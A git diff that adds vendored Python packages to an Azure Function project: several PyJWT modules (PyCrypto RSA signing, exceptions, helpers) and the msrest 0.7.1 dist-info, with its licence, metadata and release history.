a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/pycrypto.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/pycrypto.py new file mode 100644 index 0000000..7c8d46c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/pycrypto.py @@ -0,0 +1,46 @@ +import Crypto.Hash.SHA256 +import Crypto.Hash.SHA384 +import Crypto.Hash.SHA512 +from Crypto.PublicKey import RSA +from Crypto.Signature import PKCS1_v1_5 + +from jwt.algorithms import Algorithm +from jwt.compat import string_types, text_type + + +class RSAAlgorithm(Algorithm): + """ + Performs signing and verification operations using + RSASSA-PKCS-v1_5 and the specified hash function. + + This class requires PyCrypto package to be installed. 
+ + This is based off of the implementation in PyJWT 0.3.2 + """ + SHA256 = Crypto.Hash.SHA256 + SHA384 = Crypto.Hash.SHA384 + SHA512 = Crypto.Hash.SHA512 + + def __init__(self, hash_alg): + self.hash_alg = hash_alg + + def prepare_key(self, key): + + if isinstance(key, RSA._RSAobj): + return key + + if isinstance(key, string_types): + if isinstance(key, text_type): + key = key.encode('utf-8') + + key = RSA.importKey(key) + else: + raise TypeError('Expecting a PEM- or RSA-formatted key.') + + return key + + def sign(self, msg, key): + return PKCS1_v1_5.new(key).sign(self.hash_alg.new(msg)) + + def verify(self, msg, key, sig): + return PKCS1_v1_5.new(key).verify(self.hash_alg.new(msg), sig) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/exceptions.py new file mode 100644 index 0000000..f40bffb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/exceptions.py @@ -0,0 +1,59 @@ +class PyJWTError(Exception): + """ + Base class for all exceptions + """ + pass + + +class InvalidTokenError(PyJWTError): + pass + + +class DecodeError(InvalidTokenError): + pass + + +class InvalidSignatureError(DecodeError): + pass + + +class ExpiredSignatureError(InvalidTokenError): + pass + + +class InvalidAudienceError(InvalidTokenError): + pass + + +class InvalidIssuerError(InvalidTokenError): + pass + + +class InvalidIssuedAtError(InvalidTokenError): + pass + + +class ImmatureSignatureError(InvalidTokenError): + pass + + +class InvalidKeyError(PyJWTError): + pass + + +class InvalidAlgorithmError(InvalidTokenError): + pass + + +class MissingRequiredClaimError(InvalidTokenError): + def __init__(self, claim): + self.claim = claim + + def __str__(self): + return 'Token is missing the "%s" claim' % self.claim + + +# Compatibility aliases (deprecated) +ExpiredSignature = ExpiredSignatureError +InvalidAudience = InvalidAudienceError +InvalidIssuer = InvalidIssuerError diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/help.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/help.py new file mode 100644 index 0000000..6db1953 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/help.py @@ -0,0 +1,61 @@ +from __future__ import print_function + +import json +import platform +import sys + +from . import __version__ as pyjwt_version + +try: + import cryptography +except ImportError: + cryptography = None + +try: + import ecdsa +except ImportError: + ecdsa = None + + +def info(): + """ + Generate information for a bug report. + Based on the requests package help utility module. 
+ """ + try: + platform_info = {"system": platform.system(), "release": platform.release()} + except IOError: + platform_info = {"system": "Unknown", "release": "Unknown"} + + implementation = platform.python_implementation() + + if implementation == "CPython": + implementation_version = platform.python_version() + elif implementation == "PyPy": + implementation_version = "%s.%s.%s" % ( + sys.pypy_version_info.major, + sys.pypy_version_info.minor, + sys.pypy_version_info.micro, + ) + if sys.pypy_version_info.releaselevel != "final": + implementation_version = "".join( + [implementation_version, sys.pypy_version_info.releaselevel] + ) + else: + implementation_version = "Unknown" + + return { + "platform": platform_info, + "implementation": {"name": implementation, "version": implementation_version}, + "cryptography": {"version": getattr(cryptography, "__version__", "")}, + "pyjwt": {"version": pyjwt_version}, + } + + +def main(): + """Pretty-print the bug information as JSON.""" + print(json.dumps(info(), sort_keys=True, indent=2)) + + +if __name__ == "__main__": + main() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/utils.py new file mode 100644 index 0000000..b6f36f9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/utils.py @@ -0,0 +1,113 @@ +import base64 +import binascii +import struct + +from .compat import binary_type, bytes_from_int, text_type + +try: + from cryptography.hazmat.primitives.asymmetric.utils import ( + decode_dss_signature, encode_dss_signature + ) +except ImportError: + pass + + +def force_unicode(value): + if isinstance(value, binary_type): + return value.decode('utf-8') + elif isinstance(value, text_type): + return value + else: + raise TypeError('Expected a string value') + + +def force_bytes(value): + if isinstance(value, text_type): + return value.encode('utf-8') + elif isinstance(value, binary_type): + return value + else: + raise TypeError('Expected a string value') + + +def base64url_decode(input): + if isinstance(input, text_type): + input = input.encode('ascii') + + rem = len(input) % 4 + + if rem > 0: + input += b'=' * (4 - rem) + + return base64.urlsafe_b64decode(input) + + +def base64url_encode(input): + return base64.urlsafe_b64encode(input).replace(b'=', b'') + + +def to_base64url_uint(val): + if val < 0: + raise ValueError('Must be a positive integer') + + int_bytes = bytes_from_int(val) + + if len(int_bytes) == 0: + int_bytes = b'\x00' + + return base64url_encode(int_bytes) + + +def from_base64url_uint(val): + if isinstance(val, text_type): + val = val.encode('ascii') + + data = base64url_decode(val) + + buf = struct.unpack('%sB' % len(data), data) + return int(''.join(["%02x" % byte for byte in buf]), 16) + + +def merge_dict(original, updates): + if not updates: + return original + + try: + merged_options = original.copy() + merged_options.update(updates) + except (AttributeError, ValueError) as e: + raise TypeError('original and updates must be a dictionary: %s' % e) + + return merged_options + + +def number_to_bytes(num, num_bytes): + padded_hex = '%0*x' % (2 * num_bytes, num) + big_endian = binascii.a2b_hex(padded_hex.encode('ascii')) + return big_endian + + +def bytes_to_number(string): + return int(binascii.b2a_hex(string), 16) + + +def der_to_raw_signature(der_sig, curve): + num_bits = curve.key_size + num_bytes = (num_bits + 7) // 8 + + r, s 
= decode_dss_signature(der_sig) + + return number_to_bytes(r, num_bytes) + number_to_bytes(s, num_bytes) + + +def raw_to_der_signature(raw_sig, curve): + num_bits = curve.key_size + num_bytes = (num_bits + 7) // 8 + + if len(raw_sig) != 2 * num_bytes: + raise ValueError('Invalid signature') + + r = bytes_to_number(raw_sig[:num_bytes]) + s = bytes_to_number(raw_sig[num_bytes:]) + + return encode_dss_signature(r, s) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/LICENSE.md b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/LICENSE.md new file mode 100644 index 0000000..e0642d1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/LICENSE.md @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2016 Microsoft Azure + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/METADATA new file mode 100644 index 0000000..fcb3cf9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/METADATA @@ -0,0 +1,801 @@ +Metadata-Version: 2.1 +Name: msrest +Version: 0.7.1 +Summary: AutoRest swagger generator Python client runtime. 
+Home-page: https://github.com/Azure/msrest-for-python +Author: Microsoft Corporation +License: MIT License +Platform: UNKNOWN +Classifier: Development Status :: 4 - Beta +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: License :: OSI Approved :: MIT License +Classifier: Topic :: Software Development +Requires-Python: >=3.6 +Requires-Dist: azure-core (>=1.24.0) +Requires-Dist: certifi (>=2017.4.17) +Requires-Dist: isodate (>=0.6.0) +Requires-Dist: requests-oauthlib (>=0.5.0) +Requires-Dist: requests (~=2.16) +Provides-Extra: async +Requires-Dist: aiodns ; (python_version>='3.5') and extra == 'async' +Requires-Dist: aiohttp (>=3.0) ; (python_version>='3.5') and extra == 'async' + +AutoRest: Python Client Runtime +=============================== + +.. image:: https://travis-ci.org/Azure/msrest-for-python.svg?branch=master + :target: https://travis-ci.org/Azure/msrest-for-python + +.. image:: https://codecov.io/gh/azure/msrest-for-python/branch/master/graph/badge.svg + :target: https://codecov.io/gh/azure/msrest-for-python + +Installation +------------ + +To install: + +.. code-block:: bash + + $ pip install msrest + + +Release History +--------------- + +2022-06-10 Version 0.7.1 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Declare correctly msrest as Python 3.6 and more only for clarity #251 + + +2022-06-07 Version 0.7.0 ++++++++++++++++++++++++++ + +**Features** + +- Add `azure-core` as installation requirement #247 +- Replace `SerializationError` and `DeserializationError` in `msrest.exceptions` with those in `azure.core` #247 + +**Bugfixes** + +- Typing annotation in LROPoller (thanks to akx) #242 + +Thanks to kianmeng for typo fixes in the documentation. + +2021-01-26 Version 0.6.21 ++++++++++++++++++++++++++ + +**Bug Fixes** + +- Fixes `failsafe_deserialize` introduced in `0.6.20` #232 + +2021-01-25 Version 0.6.20 ++++++++++++++++++++++++++ + +**Features** + +- Add `failsafe_deserialize` method to the `Deserializer` object. #232 +- Serialize `datetime`, `date`, `time`, `timedelta` and `Decimal` correctly when serializing `object` . 
#224 + +2020-09-08 Version 0.6.19 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix serialization of random Model object #220 +- Fix serialization of unicode string in Py2 and object mode #221 + + +2020-07-27 Version 0.6.18 ++++++++++++++++++++++++++ + +**Features** + +- Add support for attributes/text in the same XML node #218 + + +2020-06-25 Version 0.6.17 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix XML and discriminator #214 + + +2020-06-09 Version 0.6.16 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix XML parsing with namespaces and attributes #209 + +**Features** + +- Add py.typed for mypy support + + +2020-06-04 Version 0.6.15 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix RFC regression introduced in 0.6.14 (RFC parse date are no longer pickable) #208 +- Fix XML parsing with namespaces #206 + +Thanks to ivanst0 for the contribution + + +2020-05-18 Version 0.6.14 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix "from_dict" in some complex flattening scenario #204 +- Fix RFC date parsing if machine locale is not English #201 + + +2020-04-07 Version 0.6.13 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix deserializer and flattening if intermediate node is None #198 +- Fix validation exception message for minimum/maximum checks #199 + + +2020-04-06 Version 0.6.12 ++++++++++++++++++++++++++ + +**Features** + +- Add "time" serializer/deserializer #196 + +2020-01-30 Version 0.6.11 ++++++++++++++++++++++++++ + +**Features** + +- XML mode can now be enabled even if the given Model has no XML metadata #184 +- Add Kerberos Authentication #186 +- Improve error message if expected type is dictionary and something else is provided #188 + +**Bugfixes** + +- Fix comma separated serialization of array in query #186 +- Fix validation of basic types in some complex scenario #189 + +Thanks to catatonicprime for the contribution + +2019-09-04 Version 0.6.10 ++++++++++++++++++++++++++ + +**Features** + +- XML mode now supports OpenAPI additional properties # 174 + +**Bugfixes** + +- Accept "is_xml" kwargs to force XML serialization #178 +- Disable XML deserialization if received element is not an ElementTree #178 +- A "null" enum deserialize as None, and not "None" anymore #173 +- Fix some UTF8 encoding issue in Python 2.7 and XML mode #172 + + +2019-07-24 Version 0.6.9 +++++++++++++++++++++++++ + +**Features** + +- Accept extensions of JSON mimetype as valid JSON #167 + +2019-06-24 Version 0.6.8 +++++++++++++++++++++++++ + +**BugFixes** + +- Impossible to serialize XML if model contains UTF8 characters on Python 2.7 #165 +- Impossible to deserialize a HTTP response as XML if body contains UTF8 characters on Python 2.7 #165 +- Loading a serialized configuration fails with NameError on NoOptionError #162 + +Thanks to cclauss for the contribution + +2019-06-12 Version 0.6.7 +++++++++++++++++++++++++ + +**Features** + +- Add DomainCredentials credentials for EventGrid + +Thanks to kalyanaj for the contribution + +2019-03-21 Version 0.6.6 +++++++++++++++++++++++++ + +**Bugfixes** + +- Make 0.6.x series compatible with pyinstaller again +- sdist now includes tests + +Thanks to dotlambda for the contribution + +2019-03-11 Version 0.6.5 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix list of integers serialization if div is provided #151 +- Fix parsing of UTF8 with BOM #145 + +Thanks to eduardomourar for the contribution + +2019-01-09 Version 0.6.4 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix regression on credentials configuration if used outside of Autorest scope #135 + 
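+For illustration, a minimal sketch of the "failsafe_deserialize" method from the
+0.6.20 entry above ("ErrorModel" is a hypothetical generated model class and
+"response_body" stands for raw response data):
+
+.. code-block:: python
+
+    from msrest import Deserializer
+
+    deserializer = Deserializer({'ErrorModel': ErrorModel})
+    # Unlike a plain deserialize call, failsafe_deserialize catches
+    # DeserializationError and returns None on a malformed payload.
+    error = deserializer.failsafe_deserialize('ErrorModel', response_body)
+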
+2019-01-08 Version 0.6.3 +++++++++++++++++++++++++ + +**Features** + +- Updated **experimental** async support. Requires Autorest.Python 4.0.64. + +2018-11-19 Version 0.6.2 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix circular dependency in TYPE_CHECKING mode #128 + +2018-10-15 Version 0.6.1 +++++++++++++++++++++++++ + +**Bugfixes** + +- Remove unnecessary verbose "warnings" log #126 + +2018-10-02 Version 0.6.0 +++++++++++++++++++++++++ + +**Features** + +- The environment variable AZURE_HTTP_USER_AGENT, if present, is now injected part of the UserAgent +- New **preview** msrest.universal_http module. Provide tools to generic HTTP management (sync/async, requests/aiohttp, etc.) +- New **preview** msrest.pipeline implementation: + + - A Pipeline is an ordered list of Policies than can process an HTTP request and response in a generic way. + - More details in the wiki page about Pipeline: https://github.com/Azure/msrest-for-python/wiki/msrest-0.6.0---Pipeline + +- Adding new attributes to Configuration instance: + + - http_logger_policy - Policy to handle HTTP logging + - user_agent_policy - Policy to handle UserAgent + - pipeline - The current pipeline used by the SDK client + - async_pipeline - The current async pipeline used by the async SDK client + +- Installing "msrest[async]" now installs the **experimental** async support. Works ONLY for Autorest.Python 4.0.63. + +**Breaking changes** + +- The HTTPDriver API introduced in 0.5.0 has been replaced by the Pipeline implementation. + +- The following classes have been moved from "msrest.pipeline" to "msrest.universal_http": + + - ClientRedirectPolicy + - ClientProxies + - ClientConnection + +- The following classes have been moved from "msrest.pipeline" to "msrest.universal_http.requests": + + - ClientRetryPolicy + +**Bugfixes** + +- Fix "long" on Python 2 if used with the "object" type #121 + +Thanks to robgolding for the contribution + +2018-09-04 Version 0.5.5 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix a serialization issue if additional_properties is declared, and "automatic model" syntax is used + ("automatic model" being the ability to pass a dict to command and have the model auto-created) # 120 + +2018-07-12 Version 0.5.4 +++++++++++++++++++++++++ + +**Features** + +- Support additionalProperties and XML + +**BugFixes** + +- Better parse empty node and not string types +- Improve "object" XML parsing + +2018-07-10 Version 0.5.3 +++++++++++++++++++++++++ + +**BugFixes** + +- Fix some XML serialization subtle scenarios + +2018-07-09 Version 0.5.2 +++++++++++++++++++++++++ + +**Features** + +- deserialize/from_dict now accepts a content-type parameter to parse XML strings + +**Bugfixes** + +- Fix some complex XML Swagger definitions. + +This release likely breaks already generated XML SDKs, that needs to be regenerated with autorest.python 3.0.58 + +2018-06-21 Version 0.5.1 +++++++++++++++++++++++++ + +**Bugfixes** + +- Lower Accept header overwrite logging message #110 +- Fix 'object' type and XML format + +Thanks to dharmab for the contribution + +2018-06-12 Version 0.5.0 +++++++++++++++++++++++++ + +**Disclaimer** + +This released is designed to be backward compatible with 0.4.x, but there is too many internal refactoring +and new features to continue with 0.4.x versioning + +**Features** + +- Add XML support +- Add many type hints, and MyPY testing on CI. +- HTTP calls are made through a HTTPDriver API. Only implementation is `requests` for now. 
This driver API is *not* considered stable + and you should pin your msrest version if you want to provide a personal implementation. + +**Bugfixes** + +- Incorrect milliseconds serialization for some datetime object #94 + +**Deprecation** + +That will trigger a DeprecationWarning if an old Autorest generated code is used. + +- _client.add_header is deprecated, and config.headers should be used instead +- _client.send_formdata is deprecated, and _client.put/get/delete/post + _client.send should be used instead + +2018-04-30 Version 0.4.29 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Improve `SDKClient.__exit__` to take exc_details as optional parameters and not required #93 +- refresh_session should also use the permanent HTTP session if available #91 + +2018-04-18 Version 0.4.28 ++++++++++++++++++++++++++ + +**Features** + +- msrest is now able to keep the "requests.Session" alive for performance. To activate this behavior: + + - Use the final Client as a context manager (requires generation with Autorest.Python 3.0.50 at least) + - Use `client.config.keep_alive = True` and `client.close()` (requires generation with Autorest.Python 3.0.50 at least) + - Use `client.config.keep_alive = True` and client._client.close() (not recommended, but available in old releases of SDK) + +- All Authentication classes now define `signed_session` and `refresh_session` with an optional `session` parameter. + To take benefits of the session improvement, a subclass of Authentication *MUST* add this optional parameter + and use it if it's not `None`: + + def signed_session(self, session=None): + session = session or requests.Session() + + # As usual from here. + +2018-03-07 Version 0.4.27 ++++++++++++++++++++++++++ + +**Features** + +- Disable HTTP log by default (security), add `enable_http_log` to restore it #86 + +**BugFixes** + +- Fix incorrect date parsing if ms precision is over 6 digits #82 + +2018-01-30 Version 0.4.26 ++++++++++++++++++++++++++ + +**Features** + +- Add TopicCredentials for EventGrid client + +**Bugfixes** + +- Fix minimal dependency of isodate +- Fix serialisation from dict if datetime provided + +2018-01-08 Version 0.4.25 ++++++++++++++++++++++++++ + +**Features** + +- Add LROPoller class. This is a customizable LRO engine. + This is the poller engine of Autorest.Python 3.0, and is not used by code generated by previous Autorest version. + +2018-01-03 Version 0.4.24 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Date parsing is now compliant with Autorest / Swagger 2.0 specification (less lenient) + +**Internal optimisation** + +- Call that does not return a streamable object are now executed in requests stream mode False (was True whatever the type of the call). + This should reduce the number of leaked opened session and allow urllib3 to manage connection pooling more efficiently. + Only clients generated with Autorest.Python >= 2.1.31 (not impacted otherwise, fully backward compatible) + +2017-12-21 Version 0.4.23 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Accept to deserialize enum of different type if content string match #75 +- Stop failing on deserialization if enum string is unkwon. Return the string instead. 
+
+**Features**
+
+- Model now accepts kwargs in constructor for future kwargs models
+
+2017-12-15 Version 0.4.22
++++++++++++++++++++++++++
+
+**Bugfixes**
+
+- Do not validate additional_properties #73
+- Improve validation error if expected type is dict, but actual type is not #73
+
+2017-12-14 Version 0.4.21
++++++++++++++++++++++++++
+
+**Bugfixes**
+
+- Fix additional_properties if Swagger was flattened #72
+
+2017-12-13 Version 0.4.20
++++++++++++++++++++++++++
+
+**Features**
+
+- Add support for additional_properties
+
+  - By default, all additional_properties are kept.
+  - Additional properties are sent to the server only if they were specified in the Swagger,
+    or if "enable_additional_properties_sending" is called on the model for which we want it.
+    This is a class method that enables it for all instances of this model.
+
+2017-11-20 Version 0.4.19
++++++++++++++++++++++++++
+
+**Features**
+
+- The interpretation of Swagger 2.0 "discriminator" is now lenient. This means, for these two scenarios:
+
+  - Discriminator value is missing from the received payload
+  - Discriminator value is not defined in the Swagger
+
+  Instead of failing with an exception, this now returns the base type for this "discriminator".
+
+  Note that this is not a contradiction of the Swagger 2.0 spec, which specifies
+  "validation SHOULD fail [...] there may exist valid reasons in particular circumstances to ignore a particular item,
+  but the full implications must be understood and carefully weighed before choosing a different course."
+
+  This cannot be configured for now and is the new default behavior, but could be made configurable in the future if needed.
+
+**Bugfixes**
+
+- Optional formdata parameters were raising an exception (#65)
+- "application/x-www-form-urlencoded" form was sent using "multipart/form-data".
+  This causes problems if the server does not support "multipart/form-data" (#66)
+
+2017-10-26 Version 0.4.18
++++++++++++++++++++++++++
+
+**Features**
+
+- Add ApiKeyCredentials class. This can be used to support the OpenAPI ApiKey feature.
+- Add CognitiveServicesAuthentication class. Pre-declared ApiKeyCredentials class for Cognitive Services.
+
+2017-10-12 Version 0.4.17
++++++++++++++++++++++++++
+
+**Features**
+
+This makes Authentication classes more consistent:
+
+- OAuthTokenAuthentication is now a subclass of BasicTokenAuthentication (was Authentication)
+- BasicTokenAuthentication now has a "set_token" method that does nothing.
+
+This allows tests like "isinstance(o, BasicTokenAuthentication)" to guarantee that the following attributes exist:
+
+- token
+- set_token()
+- signed_session()
+
+This means that users of "msrestazure" are guaranteed that all AD classes somehow inherit from "BasicTokenAuthentication"
+
+2017-10-05 Version 0.4.16
++++++++++++++++++++++++++
+
+**Bugfixes**
+
+- Fix regression: accept "set" as a valid "[str]" (#60)
+
+2017-09-28 Version 0.4.15
++++++++++++++++++++++++++
+
+**Bugfixes**
+
+- Always log response body (#16)
+- Improved exception message if error JSON is OData v4 (#55)
+- Refuse "str" as a valid "[str]" type (#41)
+- Better exception handling if input from server is not valid JSON
+
+**Features**
+
+- Add Configuration.session_configuration_callback to customize the requests.Session if necessary (#52)
+- Add a flag to Serializer to disable client-side validation (#51)
+- Remove "import requests" from "exceptions.py" for apps that require fast loading time (#23)
+
+Thank you to jayden-at-arista for the contribution
+
+2017-08-23 Version 0.4.14
++++++++++++++++++++++++++
+
+**Bugfixes**
+
+- Fix regression introduced in msrest 0.4.12 - dict syntax with enum modeled as string and enum used
+
+2017-08-22 Version 0.4.13
++++++++++++++++++++++++++
+
+**Bugfixes**
+
+- Fix regression introduced in msrest 0.4.12 - dict syntax using isodate.Duration (#42)
+
+2017-08-21 Version 0.4.12
++++++++++++++++++++++++++
+
+**Features**
+
+- Input is now more lenient
+- Model now has a "validate" method to check content constraints
+- Model now has 4 new methods:
+
+  - "serialize" that gives the RestAPI that will be sent
+  - "as_dict" that returns a dict version of the Model. Callbacks are available.
+  - "deserialize" that parses the RestAPI JSON into a Model
+  - "from_dict" that parses several dict syntaxes into a Model. Callbacks are available.
+
+More details and examples in the Wiki article on Github:
+https://github.com/Azure/msrest-for-python/wiki/msrest-0.4.12---Serialization-change
+(a short sketch of these methods follows the 0.4.8 entry below)
+
+**Bugfixes**
+
+- Better Enum checking (#38)
+
+2017-06-21 Version 0.4.11
++++++++++++++++++++++++++
+
+**Bugfixes**
+
+- Fix incorrect dependency to "requests" 2.14.x, instead of 2.x meant in 0.4.8
+
+2017-06-15 Version 0.4.10
++++++++++++++++++++++++++
+
+**Features**
+
+- Add requests hooks to configuration
+
+2017-06-08 Version 0.4.9
+++++++++++++++++++++++++
+
+**Bugfixes**
+
+- Accept "null" value for paging array as an empty list and do not raise (#30)
+
+2017-05-22 Version 0.4.8
+++++++++++++++++++++++++
+
+**Bugfixes**
+
+- Fix random "pool is closed" error (#29)
+- Fix requests dependency to version 2.x, since version 3.x is announced to be breaking.
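+A minimal sketch of the four Model methods from the 0.4.12 entry above, assuming
+the usual generated "_attribute_map" layout ("Pet" is a hypothetical model class):
+
+.. code-block:: python
+
+    from msrest.serialization import Model
+
+    class Pet(Model):
+        _attribute_map = {
+            'name': {'key': 'name', 'type': 'str'},
+            'age': {'key': 'age', 'type': 'int'},
+        }
+
+        def __init__(self, name=None, age=None, **kwargs):
+            super(Pet, self).__init__(**kwargs)
+            self.name = name
+            self.age = age
+
+    # "from_dict" accepts several dict syntaxes; "as_dict" converts back.
+    pet = Pet.from_dict({'name': 'Rex', 'age': 3})
+    assert pet.as_dict() == {'name': 'Rex', 'age': 3}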
+ +2017-04-04 Version 0.4.7 +++++++++++++++++++++++++ + +**BugFixes** + +- Refactor paging #22: + + - "next" is renamed "advance_page" and "next" returns only 1 element (Python 2 expected behavior) + - paging objects are now real generator and support the "next()" built-in function without need for "iter()" + +- Raise accurate DeserialisationError on incorrect RestAPI discriminator usage #27 +- Fix discriminator usage of the base class name #27 +- Remove default mutable arguments in Clients #20 +- Fix object comparison in some scenarios #24 + +2017-03-06 Version 0.4.6 +++++++++++++++++++++++++ + +**Bugfixes** + +- Allow Model sub-classes to be serialized if type is "object" + +2017-02-13 Version 0.4.5 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix polymorphic deserialization #11 +- Fix regexp validation if '\\w' is used in Python 2.7 #13 +- Fix dict deserialization if keys are unicode in Python 2.7 + +**Improvements** + +- Add polymorphic serialisation from dict objects +- Remove chardet and use HTTP charset declaration (fallback to utf8) + +2016-09-14 Version 0.4.4 +++++++++++++++++++++++++ + +**Bugfixes** + +- Remove paging URL validation, part of fix https://github.com/Azure/autorest/pull/1420 + +**Disclaimer** + +In order to get paging fixes for impacted clients, you need this package and Autorest > 0.17.0 Nightly 20160913 + +2016-09-01 Version 0.4.3 +++++++++++++++++++++++++ + +**Bugfixes** + +- Better exception message (https://github.com/Azure/autorest/pull/1300) + +2016-08-15 Version 0.4.2 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix serialization if "object" type contains None (https://github.com/Azure/autorest/issues/1353) + +2016-08-08 Version 0.4.1 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix compatibility issues with requests 2.11.0 (https://github.com/Azure/autorest/issues/1337) +- Allow url of ClientRequest to have parameters (https://github.com/Azure/autorest/issues/1217) + +2016-05-25 Version 0.4.0 +++++++++++++++++++++++++ + +This version has no bug fixes, but implements new features of Autorest: +- Base64 url type +- unixtime type +- x-ms-enum modelAsString flag + +**Behaviour changes** + +- Add Platform information in UserAgent +- Needs Autorest > 0.17.0 Nightly 20160525 + +2016-04-26 Version 0.3.0 +++++++++++++++++++++++++ + +**Bugfixes** + +- Read only values are no longer in __init__ or sent to the server (https://github.com/Azure/autorest/pull/959) +- Useless kwarg removed + +**Behaviour changes** + +- Needs Autorest > 0.16.0 Nightly 20160426 + + +2016-03-25 Version 0.2.0 +++++++++++++++++++++++++ + +**Bugfixes** + +- Manage integer enum values (https://github.com/Azure/autorest/pull/879) +- Add missing application/json Accept HTTP header (https://github.com/Azure/azure-sdk-for-python/issues/553) + +**Behaviour changes** + +- Needs Autorest > 0.16.0 Nightly 20160324 + + +2016-03-21 Version 0.1.3 +++++++++++++++++++++++++ + +**Bugfixes** + +- Deserialisation of generic resource if null in JSON (https://github.com/Azure/azure-sdk-for-python/issues/544) + + +2016-03-14 Version 0.1.2 +++++++++++++++++++++++++ + +**Bugfixes** + +- urllib3 side effect (https://github.com/Azure/autorest/issues/824) + + +2016-03-04 Version 0.1.1 +++++++++++++++++++++++++ + +**Bugfixes** + +- Source package corrupted in Pypi (https://github.com/Azure/autorest/issues/799) + +2016-03-04 Version 0.1.0 ++++++++++++++++++++++++++ + +**Behavioural Changes** + +- Removed custom logging set up and configuration. 
All loggers are now children of the root logger 'msrest' with no pre-defined configurations. +- Replaced _required attribute in Model class with more extensive _validation dict. + +**Improvement** + +- Removed hierarchy scanning for attribute maps from base Model class - relies on generator to populate attribute + maps according to hierarchy. +- Base class Paged now inherits from collections.Iterable. +- Data validation during serialization using custom parameters (e.g. max, min etc). +- Added ValidationError to be raised if invalid data encountered during serialization. + +2016-02-29 Version 0.0.3 +++++++++++++++++++++++++ + +**Bugfixes** + +- Source package corrupted in Pypi (https://github.com/Azure/autorest/issues/718) + +2016-02-19 Version 0.0.2 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fixed bug in exception logging before logger configured. + +2016-02-19 Version 0.0.1 +++++++++++++++++++++++++ + +- Initial release. + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/RECORD new file mode 100644 index 0000000..74065cb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/RECORD @@ -0,0 +1,57 @@ +msrest-0.7.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +msrest-0.7.1.dist-info/LICENSE.md,sha256=Pd-U_zBzEWih2bP3LENkE27b0XJqeLhPRBww827GhdM,1072 